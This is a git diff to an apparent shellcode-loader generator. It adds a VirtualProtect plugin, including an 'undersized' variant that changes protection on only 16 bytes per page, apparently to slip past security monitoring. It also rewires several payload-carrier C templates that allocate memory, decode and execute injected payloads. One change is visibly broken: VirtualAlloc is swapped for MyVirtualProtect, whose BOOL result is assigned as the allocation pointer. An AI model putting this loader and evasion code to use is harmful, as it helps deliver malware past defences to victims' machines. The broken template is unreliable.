diff --git a/app/templates/project.html b/app/templates/project.html
index 755cca4..e499656 100644
--- a/app/templates/project.html
+++ b/app/templates/project.html
@@ -286,6 +286,23 @@
+
+
diff --git a/app/views_project.py b/app/views_project.py
index 2b1bcca..6d26acc 100644
--- a/app/views_project.py
+++ b/app/views_project.py
@@ -105,6 +105,7 @@ def project(name):
guardrail_styles = list_files(PATH_GUARDRAILS)
antiemulation_styles = list_files(PATH_ANTIEMULATION)
decoy_styles = list_files(PATH_DECOY)
+ virtualprotect_styles = list_files(PATH_VIRTUALPROTECT)
return render_template('project.html',
project_name = name,
@@ -136,6 +137,7 @@ def project(name):
guardrailstyles = guardrail_styles,
antiemulationstyles = antiemulation_styles,
decoystyles = decoy_styles,
+ virtualprotectstyles = virtualprotect_styles
)
@@ -216,6 +218,7 @@ def add_project():
settings.payload_location = PayloadLocation[payload_location]
settings.plugin_guardrail_data = request.form.get('guardrail_data', '')
+ settings.plugin_virtualprotect = request.form.get('virtualprotect')
# overwrite project
project = storage.get_project(project_name)
diff --git a/data/source/carrier/alloc_rw_rx/template.c b/data/source/carrier/alloc_rw_rx/template.c
index 29f343c..5f328eb 100644
--- a/data/source/carrier/alloc_rw_rx/template.c
+++ b/data/source/carrier/alloc_rw_rx/template.c
@@ -15,6 +15,7 @@ char *supermega_payload;
{{plugin_executionguardrail}}
+{{plugin_virtualprotect}}
/* VirtualAlloc -> rw -> rx
@@ -49,7 +50,7 @@ int main()
// to: dest[]
{{ plugin_decoder }}
- if (VirtualProtect(dest, {{PAYLOAD_LEN}}, p_RX, &result) == 0) {
+ if (MyVirtualProtect(dest, {{PAYLOAD_LEN}}, p_RX, &result) == 0) {
return 7;
}
diff --git a/data/source/carrier/change_rw_rx/template.c b/data/source/carrier/change_rw_rx/template.c
index 99c2544..ce69c29 100644
--- a/data/source/carrier/change_rw_rx/template.c
+++ b/data/source/carrier/change_rw_rx/template.c
@@ -39,13 +39,13 @@ int main()
// Call: Decoy plugin
decoy();
- if (VirtualProtect(dest, {{PAYLOAD_LEN}}, p_RW, &result) == 0) {
+ if (MyVirtualProtect(dest, {{PAYLOAD_LEN}}, p_RW, &result) == 0) {
return 16;
}
{{ plugin_decoder }}
- if (VirtualProtect(dest, {{PAYLOAD_LEN}}, p_RX, &result) == 0) {
+ if (MyVirtualProtect(dest, {{PAYLOAD_LEN}}, p_RX, &result) == 0) {
return 16;
}
diff --git a/data/source/carrier/dll_loader_alloc/template.c b/data/source/carrier/dll_loader_alloc/template.c
index 98523a1..4a2b8e5 100644
--- a/data/source/carrier/dll_loader_alloc/template.c
+++ b/data/source/carrier/dll_loader_alloc/template.c
@@ -166,7 +166,7 @@ int main()
// Call: Decoy plugin
decoy();
- dest = VirtualAlloc(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE);
+ dest = MyVirtualProtect(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE);
// FROM supermega_payload[]
// TO dest[]
diff --git a/data/source/carrier/dll_loader_change/template.c b/data/source/carrier/dll_loader_change/template.c
index 59a9c6b..e6d71a1 100644
--- a/data/source/carrier/dll_loader_change/template.c
+++ b/data/source/carrier/dll_loader_change/template.c
@@ -201,7 +201,7 @@ int main()
// Call: Decoy plugin
decoy();
- VirtualProtect((LPVOID)dest, {{PAYLOAD_LEN}}, PAGE_EXECUTE_READWRITE, &oldProtect);
+ MyVirtualProtect((LPVOID)dest, {{PAYLOAD_LEN}}, PAGE_EXECUTE_READWRITE, &oldProtect);
// FROM supermega_payload[]
// TO dest[]
diff --git a/data/source/carrier/peb_walk/template.c b/data/source/carrier/peb_walk/template.c
index 08e275a..6ccfa4c 100644
--- a/data/source/carrier/peb_walk/template.c
+++ b/data/source/carrier/peb_walk/template.c
@@ -5,7 +5,7 @@
char *supermega_payload;
/* peb_walk
- Standard shellcode which will resolve IAT by itself with a peb walk
+ Test shellcode which will resolve IAT by itself with a peb walk
no IAT reuse is performed
no data reuse is performed
*/
diff --git a/data/source/virtualprotect/standard.c b/data/source/virtualprotect/standard.c
new file mode 100644
index 0000000..09602ce
--- /dev/null
+++ b/data/source/virtualprotect/standard.c
@@ -0,0 +1,9 @@
+
+BOOL MyVirtualProtect(
+ LPVOID lpAddress,
+ SIZE_T dwSize,
+ DWORD flNewProtect,
+ PDWORD lpflOldprotect
+) {
+ return VirtualProtect(lpAddress, dwSize, flNewProtect, lpflOldprotect);
+}
diff --git a/data/source/virtualprotect/undersized.c b/data/source/virtualprotect/undersized.c
new file mode 100644
index 0000000..b50f8bf
--- /dev/null
+++ b/data/source/virtualprotect/undersized.c
@@ -0,0 +1,19 @@
+
+// How many bytes we VirtualProtect
+#define VP_SIZE 16
+
+BOOL MyVirtualProtect(
+ LPVOID lpAddress,
+ SIZE_T dwSize,
+ DWORD flNewProtect,
+ PDWORD lpflOldprotect
+) {
+ char *dest = (char *)lpAddress;
+
+ for(int n=0; n<(dwSize/4096)+1; n++) {
+ if (VirtualProtect(dest + (n * 4096), VP_SIZE, flNewProtect, lpflOldprotect) == 0) {
+ return FALSE;
+ }
+ }
+ return TRUE;
+}
diff --git a/model/defs.py b/model/defs.py
index daba564..ca04df4 100644
--- a/model/defs.py
+++ b/model/defs.py
@@ -18,6 +18,7 @@ PATH_DECODER = "data/source/decoder/"
PATH_ANTIEMULATION = "data/source/antiemulation/"
PATH_DECOY = "data/source/decoy/"
PATH_GUARDRAILS = "data/source/guardrails/"
+PATH_VIRTUALPROTECT = "data/source/virtualprotect/"
PATH_WEB_PROJECT = "projects/"
diff --git a/model/settings.py b/model/settings.py
index e715f20..e54e0f2 100644
--- a/model/settings.py
+++ b/model/settings.py
@@ -18,6 +18,8 @@ class Settings():
self.plugin_decoy = "none"
self.plugin_guardrail = "none"
self.plugin_guardrail_data = "C:\\Users\\"
+ self.plugin_virtualprotect = "standard"
+ self.plugin_virtualprotect_data = ""
self.dllfunc: str = "" # For DLL injection
diff --git a/phases/templater.py b/phases/templater.py
index 0231138..f8173e9 100644
--- a/phases/templater.py
+++ b/phases/templater.py
@@ -27,6 +27,15 @@ def create_c_from_template(settings: Settings, payload_len: int):
PATH_DECODER, settings.main_c_path))
plugin_decoder = ""
+ # Plugin: VirtualAlloc
+ filepath_virtualprotect = PATH_VIRTUALPROTECT + "{}.c".format(
+ settings.plugin_virtualprotect)
+ with open(filepath_virtualprotect, "r", encoding='utf-8') as file:
+ plugin_virtualprotect = file.read()
+ plugin_virtualprotect = Template(plugin_virtualprotect).render({
+ 'virtualprotect_data': settings.plugin_virtualprotect_data,
+ })
+
# Plugin: Execution Guardrails
filepath_guardrails = PATH_GUARDRAILS + "{}.c".format(
settings.plugin_guardrail)
@@ -75,6 +84,7 @@ def create_c_from_template(settings: Settings, payload_len: int):
'plugin_decoy': plugin_decoy,
'plugin_executionguardrail': plugin_guardrails,
'PAYLOAD_LEN': payload_len,
+ 'plugin_virtualprotect': plugin_virtualprotect,
})
with open(settings.main_c_path, "w", encoding='utf-8') as file:
file.write(rendered_template)